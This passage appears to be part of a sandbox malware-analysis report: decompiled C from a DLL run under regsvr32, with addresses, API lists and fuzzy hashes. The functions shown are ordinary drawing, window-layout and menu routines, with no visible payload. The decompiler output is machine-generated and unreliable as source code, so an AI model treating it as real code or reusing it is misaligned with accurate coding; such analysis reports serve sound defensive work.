						_t130 =  *((intOrPtr*)( *_t181 + 0x30))( *((intOrPtr*)(_t183 + 0x18)));
						 *((intOrPtr*)(_t183 + 0x18)) = _t130;
						_t132 =  *((intOrPtr*)( *_t181 + 0x2c))( *((intOrPtr*)(_t183 + 0x1c)));
						_t179 =  *((intOrPtr*)(_t183 + 0x10));
						_t175 =  *(_t183 + 0xc);
						 *((intOrPtr*)(_t183 + 0x1c)) = _t132;
						 *((intOrPtr*)(_t183 - 0x44)) =  *(_t183 - 0x60) + _t179;
						 *(_t183 - 0x50) = _t175;
						 *((intOrPtr*)(_t183 - 0x4c)) = _t179;
						 *((intOrPtr*)(_t183 - 0x48)) =  *(_t183 - 0x64) + _t175;
						FillRect( *(_t181 + 4), _t183 - 0x50,  *(_t183 - 0x1c));
						 *((intOrPtr*)( *_t181 + 0x30))( *((intOrPtr*)(_t183 + 0x18)));
						 *((intOrPtr*)( *_t181 + 0x2c))( *((intOrPtr*)(_t183 + 0x1c)));
						E1000C436(_t181,  *(_t183 + 0xc), _t179,  *(_t183 - 0x64),  *(_t183 - 0x60), _t183 - 0x30, 0, 0, 0x660046);
						E1000C436(_t181,  *(_t183 + 0xc), _t179,  *(_t183 - 0x64),  *(_t183 - 0x60), _t183 - 0x40, 0, 0, 0x8800c6);
						E1000C436(_t181,  *(_t183 + 0xc), _t179,  *(_t183 - 0x64),  *(_t183 - 0x60), _t183 - 0x30, 0, 0, 0x660046);
						E1000D0A1( *(_t183 - 0x3c),  *((intOrPtr*)( *((intOrPtr*)(_t183 - 0x10)) + 4)));
						E1000D0A1( *(_t183 - 0x2c),  *( *((intOrPtr*)(_t183 + 0x14)) + 4));
					}
				}
				 *(_t183 - 4) = 2;
				 *((intOrPtr*)(_t183 - 0x20)) = 0x10098308;
				L1000CFF6(_t183 - 0x20);
				 *(_t183 - 4) = 1;
				 *((intOrPtr*)(_t183 - 0x18)) = 0x10098308;
				L1000CFF6(_t183 - 0x18);
				 *(_t183 - 4) = 0;
				L1000CD56(_t183 - 0x40);
				 *(_t183 - 4) =  *(_t183 - 4) | 0xffffffff;
				return E10047725(L1000CD56(_t183 - 0x30));
			}

0x1000ddd6
0x1000dddd
0x1000dde9
0x1000ddec
0x1000ddef
0x1000ddf2
0x1000ddf5
0x1000ddf8
0x1000ddfb
0x1000ddfe
0x1000de01
0x1000de04
0x1000de07
0x1000de0e
0x1000de11
0x1000de18
0x1000de1f
0x1000de2a
0x1000de74
0x1000de80
0x1000de88
0x1000de9e
0x1000deb4
0x1000deba
0x1000dec2
0x1000dec5
0x1000def7
0x1000df0f
0x1000df31
0x1000df3d
0x1000df43
0x1000df4a
0x1000df4d
0x1000df53
0x1000df59
0x1000df61
0x1000df6d
0x1000df70
0x1000df73
0x1000df76
0x1000df83
0x1000df8d
0x1000dfa7
0x1000dfc3
0x1000dfdf
0x1000dfed
0x1000dffb
0x1000dffb
0x1000dec5
0x1000e008
0x1000e00c
0x1000e00f
0x1000e017
0x1000e01b
0x1000e01e
0x1000e026
0x1000e029
0x1000e02e
0x1000e03f

APIs

__EH_prolog3.LIBCMT ref: 1000DDDD

Part of subcall function 1000D064: CreateCompatibleDC.GDI32(?), ref: 1000D073

GetObjectA.GDI32(00000003,00000018,?), ref: 1000DE4D
CreateBitmap.GDI32(00000008,00000008,00000001,00000001,1009A514), ref: 1000DE6E

Part of subcall function 1000D03E: CreatePatternBrush.GDI32(?), ref: 1000D04D

CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 1000DE98

Part of subcall function 1000D0A1: SelectObject.GDI32(?,?), ref: 1000D0A9

GetPixel.GDI32(?,00000000,00000000), ref: 1000DED8

Part of subcall function 1000BD03: SetBkColor.GDI32(?,?), ref: 1000BD1D
Part of subcall function 1000BD03: SetBkColor.GDI32(?,?), ref: 1000BD2B

BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 1000DF05
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00EE0086), ref: 1000DF29
FillRect.USER32(00000003,?,?), ref: 1000DF76

Part of subcall function 1000C436: BitBlt.GDI32(?,?,?,?,?,?,?,?,?), ref: 1000C45C

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Create$BitmapColorObject$BrushCompatibleFillH_prolog3PatternPixelRectSelect
String ID:
API String ID: 1458925443-0
Opcode ID: 2049ac294c08e55e4a21875b776fc7ee10fcff62426293ab6dfae7e52ea0fcb5
Instruction ID: 77c58d3e43a35b987cd2dffd8b8a9243759cfaf0f7ba19e0065bb487ce2970d6
Opcode Fuzzy Hash: 2049ac294c08e55e4a21875b776fc7ee10fcff62426293ab6dfae7e52ea0fcb5
Instruction Fuzzy Hash: 3281D175900219AFEF11DF94CD85EEEBBBAFF08340F108029F509A6261DB71AA11DB61

Uniqueness

Uniqueness Score: -1.00%

Function 1000D8C3 Relevance: 12.2, APIs: 8, Instructions: 183
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E1000D8C3(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t101;
				intOrPtr _t102;
				intOrPtr* _t157;
				void* _t159;
				void* _t160;

				_t160 = __eflags;
				_push(0x54);
				E1004764D(0x1008e110, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t159 - 0x48)) = 0x1009a2fc;
				 *(_t159 - 0x44) = 0;
				 *((intOrPtr*)(_t159 - 0x40)) = 0;
				 *((intOrPtr*)(_t159 - 0x3c)) = 0;
				 *(_t159 - 4) = 0;
				 *((intOrPtr*)(_t159 - 0x38)) = 0x1009a2fc;
				 *(_t159 - 0x34) = 0;
				 *((intOrPtr*)(_t159 - 0x30)) = 0;
				 *((intOrPtr*)(_t159 - 0x2c)) = 0;
				 *((intOrPtr*)(_t159 - 0x14)) = 0;
				 *((intOrPtr*)(_t159 - 0x18)) = 0x10098d24;
				 *(_t159 - 4) = 2;
				_push(GetSysColor(0x14));
				E1000D544(0, _t159 - 0x28, __edi, GetSysColor, _t160);
				 *(_t159 - 4) = 3;
				_push(GetSysColor(0x10));
				E1000D544(0, _t159 - 0x20, __edi, GetSysColor, _t160);
				_t157 =  *((intOrPtr*)(_t159 + 8));
				 *(_t159 - 4) = 4;
				if(E1000D064(_t159 - 0x48, _t157) != 0 && E1000D064(_t159 - 0x38, _t157) != 0) {
					_t151 =  *((intOrPtr*)(_t159 + 0x14));
					if(GetObjectA( *( *((intOrPtr*)(_t159 + 0x14)) + 4), 0x18, _t159 - 0x60) != 0 && L1000CFA3(_t159 - 0x18, _t151, _t159, CreateBitmap( *(_t159 - 0x5c),  *(_t159 - 0x58), 1, 1, 0)) != 0) {
						_t101 = E1000D0A1( *(_t159 - 0x44),  *((intOrPtr*)(_t151 + 4)));
						_t102 = E1000D0A1( *(_t159 - 0x34),  *((intOrPtr*)(_t159 - 0x14)));
						 *((intOrPtr*)(_t159 - 0x10)) = _t102;
						if(_t101 != 0 && _t102 != 0) {
							 *((intOrPtr*)(_t159 + 0x14)) = E1000BD03(GetPixel( *(_t159 - 0x44), 0, 0), _t159 - 0x48, _t103);
							E1000BD03(BitBlt( *(_t159 - 0x34), 0, 0,  *(_t159 - 0x5c),  *(_t159 - 0x58),  *(_t159 - 0x44), 0, 0, 0xcc0020), _t159 - 0x48, 0xffffff);
							BitBlt( *(_t159 - 0x34), 0, 0,  *(_t159 - 0x5c),  *(_t159 - 0x58),  *(_t159 - 0x44), 0, 0, 0x1100a6);
							E10020117(_t157,  *((intOrPtr*)(_t159 + 0xc)),  *((intOrPtr*)(_t159 + 0x10)),  *(_t159 - 0x5c),  *(_t159 - 0x58),  *((intOrPtr*)(_t159 + 0x18)));
							 *((intOrPtr*)( *_t157 + 0x2c))(0xffffff);
							 *((intOrPtr*)(_t159 + 8)) = E1000D13A(_t157, _t159 - 0x28);
							E1000C436(_t157,  *((intOrPtr*)(_t159 + 0xc)) + 1,  *((intOrPtr*)(_t159 + 0x10)) + 1,  *(_t159 - 0x5c),  *(_t159 - 0x58), _t159 - 0x38, 0, 0, 0xe20746);
							E1000D13A(_t157, _t159 - 0x20);
							E1000C436(_t157,  *((intOrPtr*)(_t159 + 0xc)),  *((intOrPtr*)(_t159 + 0x10)),  *(_t159 - 0x5c),  *(_t159 - 0x58), _t159 - 0x38, 0, 0, 0xe20746);
							E1000D13A(_t157,  *((intOrPtr*)(_t159 + 8)));
							 *((intOrPtr*)( *_t157 + 0x2c))( *((intOrPtr*)(_t159 + 0x14)));
							E1000D0A1( *(_t159 - 0x34),  *((intOrPtr*)( *((intOrPtr*)(_t159 - 0x10)) + 4)));
						}
					}
				}
				 *(_t159 - 4) = 3;
				 *((intOrPtr*)(_t159 - 0x20)) = 0x10098308;
				L1000CFF6(_t159 - 0x20);
				 *(_t159 - 4) = 2;
				 *((intOrPtr*)(_t159 - 0x28)) = 0x10098308;
				L1000CFF6(_t159 - 0x28);
				 *(_t159 - 4) = 1;
				 *((intOrPtr*)(_t159 - 0x18)) = 0x10098308;
				L1000CFF6(_t159 - 0x18);
				 *(_t159 - 4) = 0;
				L1000CD56(_t159 - 0x38);
				 *(_t159 - 4) =  *(_t159 - 4) | 0xffffffff;
				return E10047725(L1000CD56(_t159 - 0x48));
			}

0x1000d8c3
0x1000d8c3
0x1000d8ca
0x1000d8d6
0x1000d8d9
0x1000d8dc
0x1000d8df
0x1000d8e2
0x1000d8e5
0x1000d8e8
0x1000d8eb
0x1000d8ee
0x1000d8f1
0x1000d8f4
0x1000d903
0x1000d909
0x1000d90d
0x1000d914
0x1000d91a
0x1000d91e
0x1000d923
0x1000d92a
0x1000d935
0x1000d94c
0x1000d960
0x1000d98e
0x1000d99b
0x1000d9a2
0x1000d9a5
0x1000d9d7
0x1000d9ef
0x1000da09
0x1000da1c
0x1000da2a
0x1000da38
0x1000da59
0x1000da64
0x1000da7e
0x1000da88
0x1000da94
0x1000daa0
0x1000daa0
0x1000d9a5
0x1000d960
0x1000daad
0x1000dab1
0x1000dab4
0x1000dabc
0x1000dac0
0x1000dac3
0x1000dacb
0x1000dacf
0x1000dad2
0x1000dada
0x1000dadd
0x1000dae2
0x1000daf3

APIs

__EH_prolog3.LIBCMT ref: 1000D8CA
GetSysColor.USER32 ref: 1000D907

Part of subcall function 1000D544: __EH_prolog3.LIBCMT ref: 1000D54B
Part of subcall function 1000D544: CreateSolidBrush.GDI32(00000000), ref: 1000D566

GetSysColor.USER32 ref: 1000D918

Part of subcall function 1000D064: CreateCompatibleDC.GDI32(?), ref: 1000D073

GetObjectA.GDI32(00000004,00000018,?), ref: 1000D958
CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 1000D971

Part of subcall function 1000D0A1: SelectObject.GDI32(?,?), ref: 1000D0A9

GetPixel.GDI32(?,00000000,00000000), ref: 1000D9B8

Part of subcall function 1000BD03: SetBkColor.GDI32(?,?), ref: 1000BD1D
Part of subcall function 1000BD03: SetBkColor.GDI32(?,?), ref: 1000BD2B

BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 1000D9E5
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,001100A6), ref: 1000DA09

Part of subcall function 10020117: SetBkColor.GDI32(?,?), ref: 10020126
Part of subcall function 10020117: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 10020158

Part of subcall function 1000D13A: SelectObject.GDI32(?,00000000), ref: 1000D15C
Part of subcall function 1000D13A: SelectObject.GDI32(?,00000004), ref: 1000D172

Part of subcall function 1000C436: BitBlt.GDI32(?,?,?,?,?,?,?,?,?), ref: 1000C45C

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Color$Object$CreateSelect$H_prolog3$BitmapBrushCompatiblePixelSolidText
String ID:
API String ID: 2841110477-0
Opcode ID: 7ca8c7a22dcc9177c41a1f071a1246e83baa6db38511a8c6ac0d58135de08f41
Instruction ID: 9a0a8619dc2d9126584e789a73e267e3b9ea50487815501d297b1d3d9f768c12
Opcode Fuzzy Hash: 7ca8c7a22dcc9177c41a1f071a1246e83baa6db38511a8c6ac0d58135de08f41
Instruction Fuzzy Hash: FE61147590024DAEEF01EFD4CC81AEEBF7AFF08390F104029F505A62A5DB31AA51DB61

Uniqueness

Uniqueness Score: -1.00%

Function 100143DE Relevance: 12.1, APIs: 8, Instructions: 124
windowCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E100143DE(void* __ecx, intOrPtr _a4, intOrPtr _a8, signed int _a12, signed int _a16, struct tagRECT* _a20, signed int _a24, intOrPtr _a28) {
				int _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				struct tagRECT _v36;
				void* _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t61;
				int _t62;
				signed int _t64;
				void* _t72;
				intOrPtr* _t85;
				signed int _t87;
				struct HWND__* _t91;
				void* _t92;

				_t72 = __ecx;
				_t75 = _a28;
				_v8 = 0;
				_v12 = _a28;
				_v16 = 0;
				_v20 = 0;
				if(_a24 == 0) {
					GetClientRect( *(__ecx + 0x20),  &_v36);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				_t61 = _a16 & 0xffff7fff;
				_a24 = _t61;
				if(_t61 == 1) {
					_t13 =  &_v40;
					 *_t13 = _v40 & 0x00000000;
					__eflags =  *_t13;
				} else {
					_v40 = BeginDeferWindowPos(8);
				}
				_t62 = GetTopWindow( *(_t72 + 0x20));
				while(1) {
					_t91 = _t62;
					if(_t91 == 0) {
						break;
					}
					_t87 = GetDlgCtrlID(_t91) & 0x0000ffff;
					_t64 = E10014011(_t75, _t87, _t91, __eflags, _t91);
					__eflags = _t87 - _a12;
					if(__eflags != 0) {
						__eflags = _t87 - _a4;
						if(__eflags >= 0) {
							__eflags = _t87 - _a8;
							if(__eflags <= 0) {
								__eflags = _t64;
								if(__eflags != 0) {
									SendMessageA(_t91, 0x361, 0,  &_v40);
								}
							}
						}
					} else {
						_v8 = _t91;
					}
					_t62 = GetWindow(_t91, 2);
				}
				if(_a24 != 1) {
					__eflags = _a12;
					if(_a12 != 0) {
						__eflags = _v8;
						if(_v8 != 0) {
							_t62 = E10013FEA(0, _t75, _t92, _v8);
							__eflags = _a24 - 2;
							if(_a24 == 2) {
								_t85 = _a20;
								_v36.left = _v36.left +  *_t85;
								_v36.top = _v36.top +  *((intOrPtr*)(_t85 + 4));
								_v36.right = _v36.right -  *((intOrPtr*)(_t85 + 8));
								_t45 =  &(_v36.bottom);
								 *_t45 = _v36.bottom -  *((intOrPtr*)(_t85 + 0xc));
								__eflags =  *_t45;
							}
							__eflags = _a16 & 0x00008000;
							if((_a16 & 0x00008000) == 0) {
								 *((intOrPtr*)( *_t62 + 0x68))( &_v36, 0);
								_t62 = E10011DDB( &_v40, _v8,  &_v36);
							}
						}
					}
					__eflags = _v40;
					if(_v40 != 0) {
						_t62 = EndDeferWindowPos(_v40);
					}
				} else {
					if(_a28 == 0) {
						_t62 = _a20;
						 *((intOrPtr*)(_t62 + 8)) = _v20;
						 *((intOrPtr*)(_t62 + 4)) = 0;
						 *_t62 = 0;
						 *((intOrPtr*)(_t62 + 0xc)) = _v16;
					} else {
						_t62 = CopyRect(_a20,  &_v36);
					}
				}
				return _t62;
			}

0x100143ed
0x100143ef
0x100143f3
0x100143f6
0x100143f9
0x100143fc
0x100143ff
0x10014411
0x10014401
0x10014404
0x10014405
0x10014406
0x10014407
0x10014407
0x1001441a
0x10014422
0x10014425
0x10014434
0x10014434
0x10014434
0x10014427
0x1001442f
0x1001442f
0x1001443b
0x10014487
0x10014487
0x1001448b
0x00000000
0x00000000
0x1001444d
0x10014450
0x10014455
0x10014458
0x1001445f
0x10014462
0x10014464
0x10014467
0x10014469
0x1001446b
0x10014478
0x10014478
0x1001446b
0x10014467
0x1001445a
0x1001445a
0x1001445a
0x10014481
0x10014481
0x10014491
0x100144bd
0x100144c0
0x100144c2
0x100144c5
0x100144ca
0x100144cf
0x100144d3
0x100144d5
0x100144da
0x100144e0
0x100144e6
0x100144ec
0x100144ec
0x100144ec
0x100144ec
0x100144ef
0x100144f5
0x10014500
0x1001450e
0x1001450e
0x100144f5
0x100144c5
0x10014513
0x10014516
0x1001451b
0x1001451b
0x10014493
0x10014496
0x100144a7
0x100144ad
0x100144b3
0x100144b6
0x100144b8
0x10014498
0x1001449f
0x1001449f
0x10014496
0x10014525

APIs

GetClientRect.USER32 ref: 10014411
BeginDeferWindowPos.USER32 ref: 10014429
GetTopWindow.USER32(?), ref: 1001443B
GetDlgCtrlID.USER32 ref: 10014446
SendMessageA.USER32 ref: 10014478
GetWindow.USER32(00000000,00000002), ref: 10014481
CopyRect.USER32(?,?), ref: 1001449F
EndDeferWindowPos.USER32(00000000), ref: 1001451B

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$DeferRect$BeginClientCopyCtrlMessageSend
String ID:
API String ID: 1228040700-0
Opcode ID: 36d96a6004295ee8964788e3fef955f8b2bbd6967ee6e7cb077654b0102e99cd
Instruction ID: 31ad4884e3354c04f2d6a1acc6d05d77f59a758a5659da4c2f1deca1f34cf055
Opcode Fuzzy Hash: 36d96a6004295ee8964788e3fef955f8b2bbd6967ee6e7cb077654b0102e99cd
Instruction Fuzzy Hash: D841387190021ADFDF14DF94C984AEEB7B5FF09311B12816AE905AB261CB34DE81CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1003DA97 Relevance: 12.1, APIs: 8, Instructions: 100
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E1003DA97(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t32;
				char* _t39;
				char* _t49;
				intOrPtr _t54;
				void* _t63;
				char* _t66;
				signed int _t74;
				void* _t76;

				_t63 = __edx;
				_t56 = __ecx;
				_push(4);
				E1004764D(0x10091295, __ebx, __edi, __esi);
				_t54 = __ecx;
				 *((intOrPtr*)(_t76 - 0x10)) = __ecx;
				 *((intOrPtr*)(__ecx + 0xc8)) = 1;
				_t32 = 0x80c83b00;
				if(( *(_t76 + 0xc) & 0x00000004) != 0) {
					_t32 = 0x80c83300;
				}
				if(L10042700(_t56, 0, 0, 0x1009c448, _t32, 0x100b9964,  *((intOrPtr*)(_t76 + 8)), 0) != 0) {
					asm("sbb esi, esi");
					_t74 = ( ~( *(_t76 + 0xc) & 0x00005000) & 0xfffff000) + 0x00002000 |  *(_t76 + 0xc) & 0x00000040;
					_push(GetSystemMenu( *(_t54 + 0x20), 0));
					_t66 = E1001E527(_t54, _t56, 0, _t74, __eflags);
					__eflags = _t66;
					if(_t66 != 0) {
						DeleteMenu(_t66[4], 0xf000, 0);
						DeleteMenu(_t66[4], 0xf020, 0);
						DeleteMenu(_t66[4], 0xf030, 0);
						DeleteMenu(_t66[4], 0xf120, 0);
						L1000140B(_t76 + 0xc, E100184C0());
						 *(_t76 - 4) =  *(_t76 - 4) & 0x00000000;
						_t49 = L10001276(_t76 + 0xc, 0xf011);
						__eflags = _t49;
						if(_t49 != 0) {
							DeleteMenu(_t66[4], 0xf060, 0);
							AppendMenuA(_t66[4], 0, 0xf060,  *(_t76 + 0xc));
						}
						 *(_t76 - 4) =  *(_t76 - 4) | 0xffffffff;
						__eflags =  &(( *(_t76 + 0xc))[0xfffffffffffffff0]);
						L100013E3( &(( *(_t76 + 0xc))[0xfffffffffffffff0]), _t63);
						_t54 =  *((intOrPtr*)(_t76 - 0x10));
					}
					_t67 = _t54 + 0xe4;
					_t39 =  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0xe4)) + 0x168))( *((intOrPtr*)(_t76 + 8)), _t74 | 0x50000000, 0xe81f);
					__eflags = _t39;
					if(_t39 != 0) {
						L1003C8A7(_t67, _t54);
						_t39 = 1;
					}
					 *(_t54 + 0xc8) =  *(_t54 + 0xc8) & 0x00000000;
					goto L4;
				} else {
					 *(_t54 + 0xc8) = 0;
					L4:
					return E10047725(_t39);
				}
			}

0x1003da97
0x1003da97
0x1003da97
0x1003da9e
0x1003daa3
0x1003daa5
0x1003daac
0x1003dab6
0x1003dabb
0x1003dabd
0x1003dabd
0x1003dadc
0x1003daf9
0x1003db0e
0x1003db16
0x1003db1c
0x1003db1e
0x1003db20
0x1003db36
0x1003db42
0x1003db4e
0x1003db5a
0x1003db65
0x1003db6a
0x1003db76
0x1003db7b
0x1003db7d
0x1003db89
0x1003db98
0x1003db98
0x1003dba1
0x1003dba5
0x1003dba8
0x1003dbad
0x1003dbad
0x1003dbbf
0x1003dbc9
0x1003dbcf
0x1003dbd1
0x1003dbe2
0x1003dbe9
0x1003dbe9
0x1003dbd3
0x00000000
0x1003dade
0x1003dade
0x1003dae4
0x1003dae9
0x1003dae9

APIs

__EH_prolog3.LIBCMT ref: 1003DA9E
GetSystemMenu.USER32 ref: 1003DB10
DeleteMenu.USER32 ref: 1003DB36
DeleteMenu.USER32 ref: 1003DB42
DeleteMenu.USER32 ref: 1003DB4E
DeleteMenu.USER32 ref: 1003DB5A
DeleteMenu.USER32 ref: 1003DB89
AppendMenuA.USER32(?,00000000,0000F060,00000004), ref: 1003DB98

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Menu$Delete$AppendH_prolog3System
String ID:
API String ID: 1427010815-0
Opcode ID: d06b4b862f9a5b80e34edea4264a3b5332d43d1af25b555bc7d8b90be42379dd
Instruction ID: 465dc8e43b2d3f75baccc30aa32fbdcf2a0b44af295c82506afed976036a6668
Opcode Fuzzy Hash: d06b4b862f9a5b80e34edea4264a3b5332d43d1af25b555bc7d8b90be42379dd
Instruction Fuzzy Hash: 6B31D075640606BBEB21DF20CD86FAE7B65FF44754F108224FA28AE1E2CB70A910D758

Uniqueness

Uniqueness Score: -1.00%

Function 100112DC Relevance: 12.1, APIs: 8, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E100112DC(struct HDC__* _a4, RECT* _a8, intOrPtr _a12, intOrPtr _a16) {
				struct tagPOINT _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				int _t29;
				void* _t31;
				int _t33;
				int _t37;
				struct HDC__* _t53;

				if(L10010FF9() == 0) {
					if(_a12 != 0) {
						_v28.left = 0;
						_v28.top = 0;
						_v28.right = GetSystemMetrics(0);
						_t29 = GetSystemMetrics(1);
						_t53 = _a4;
						_v28.bottom = _t29;
						if(_t53 == 0) {
							if(_a8 == 0) {
								L16:
								_t31 = _a12(0x12340042, _t53,  &_v28, _a16);
								L17:
								L18:
								return _t31;
							}
							_t33 = IntersectRect( &_v28,  &_v28, _a8);
							L14:
							if(_t33 != 0) {
								goto L16;
							}
							L15:
							_t31 = 1;
							goto L17;
						}
						_t37 = GetClipBox(_t53,  &_v44);
						if(_t37 == 0) {
							L11:
							_t31 = 0;
							goto L17;
						}
						if(_t37 == 1) {
							goto L15;
						}
						if(GetDCOrgEx(_t53,  &_v12) == 0) {
							goto L11;
						}
						OffsetRect( &_v28,  ~(_v12.x),  ~(_v12.y));
						if(IntersectRect( &_v28,  &_v28,  &_v44) == 0) {
							goto L15;
						}
						if(_a8 == 0) {
							goto L16;
						}
						_t33 = IntersectRect( &_v28,  &_v28, _a8);
						goto L14;
					}
					_t31 = 0;
					goto L18;
				}
				return  *0x100bda2c(_a4, _a8, _a12, _a16);
			}

0x100112e9
0x10011308
0x1001131a
0x1001131d
0x10011324
0x10011327
0x10011329
0x1001132e
0x10011331
0x10011397
0x100113b0
0x100113bd
0x100113c0
0x100113c2
0x00000000
0x100113c2
0x100113a1
0x100113a7
0x100113a9
0x00000000
0x00000000
0x100113ab
0x100113ad
0x00000000
0x100113ad
0x1001133e
0x10011340
0x10011390
0x10011390
0x00000000
0x10011390
0x10011343
0x00000000
0x00000000
0x10011352
0x00000000
0x00000000
0x10011364
0x1001137d
0x00000000
0x00000000
0x10011382
0x00000000
0x00000000
0x1001138c
0x00000000
0x1001138c
0x1001130a
0x00000000
0x1001130a
0x00000000

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
